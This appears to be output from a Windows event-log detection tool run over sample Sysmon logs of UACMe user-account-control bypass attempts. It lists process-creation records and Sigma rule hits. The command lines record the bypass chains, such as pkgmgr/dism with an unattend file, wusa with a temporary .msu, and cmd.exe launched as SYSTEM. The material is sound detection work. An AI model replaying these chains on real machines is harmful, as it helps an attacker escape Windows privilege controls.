Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:18.619 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\syswow64\wusa.exe"" : Path: C:\Windows\SysWOW64\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 30",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:18.694 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\SysWOW64\WerFault.exe 
-pss -s 444 -p 6312 -ip 6312",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:18.715 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 80 : Path: C:\Windows\SysWOW64\WerFault.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\syswow64\wusa.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:18.824 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4348 -ip 4348",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 23 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:53.943 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BCAF0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:54.900 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml : Path: C:\Windows\System32\PkgMgr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 23",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:54.972 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 406 000002806444C740 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:55.455 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml : Path: C:\Windows\System32\PkgMgr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 23",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml"" : Path: C:\Windows\System32\Dism.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using PkgMgr and DISM,,rules/sigma/process_creation/win_uac_bypass_pkgmgr_dism.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:55.820 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 22 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:13.874 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC3D0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:14.372 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC9C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:14.977 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC890 : Path: C:\Windows\System32\consent.exe : User: NT 
AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:15.664 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC170 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:16.721 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 22",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:16.753 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 318 0000028064471300 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:16.853 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 4740 -s 128 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\SYSTEM : Parent Command: consent.exe 896 318 0000028064471300,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:16.853 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using Consent and Comctl32 - 
Process,,rules/sigma/process_creation/win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:19.915 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: consent.exe 896 318 0000028064471300",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:20.731 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 22",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:21.128 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC500 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 7564 -s 152 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\SYSTEM : Parent Command: consent.exe 896 272 00000280644BC500,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using Consent and Comctl32 - Process,,rules/sigma/process_creation/win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:23.554 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: consent.exe 896 272 00000280644BC500",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:23.555 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:55.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BCAF0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 37 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:15.354 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu : Path: C:\Windows\System32\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 37",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:15.364 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 400 00000280644220C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu : Path: C:\Windows\System32\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 37",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using NTFS Reparse Point - Process,,rules/sigma/process_creation/win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:27.049 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC040 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 36 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool 
UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:35.085 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu : Path: C:\Windows\System32\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:35.137 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 400 00000280644220C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu : Path: C:\Windows\System32\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using NTFS Reparse Point - Process,,rules/sigma/process_creation/win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:36.794 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\dcomcnfg.exe"" : Path: C:\Windows\System32\dcomcnfg.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 
36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:36.812 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 318 0000028064471E00 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:37.160 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\dcomcnfg.exe"" : Path: C:\Windows\System32\dcomcnfg.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:37.184 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\mmc.exe C:\Windows\system32\comexp.msc : Path: C:\Windows\System32\mmc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\dcomcnfg.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:37.261 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BCAF0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:49.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC3D0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 38 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:26.614 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:27.060 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 398 000002806443AF40 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:27.356 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc"" : Path: C:\Windows\System32\mmc.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 38",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" : Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe : User: MSEDGEWIN10\IEUser : Parent Command: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:29.424 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 22:50:29.459 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 39 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:06.262 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:06.419 +09:00,MSEDGEWIN10,11,high,UAC Bypass Using .NET Code Profiler on MMC,,rules/sigma/file_event/sysmon_uac_bypass_dotnet_profiler.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:06.730 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\mmc.exe"" eventvwr.msc : Path: C:\Windows\System32\mmc.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 39",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:06.796 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 376 0000028064463A00 : Path: C:\Windows\System32\consent.exe : User: NT 
AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:07.144 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\mmc.exe"" eventvwr.msc : Path: C:\Windows\System32\mmc.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 39",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\mmc.exe"" eventvwr.msc",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:08:07.558 +09:00,MSEDGEWIN10,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 41 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-04 00:16:30.389 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-04 00:16:31.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 342 00000280644BB040 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-04 00:16:31.779 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-04 16:26:33.984 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 43 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 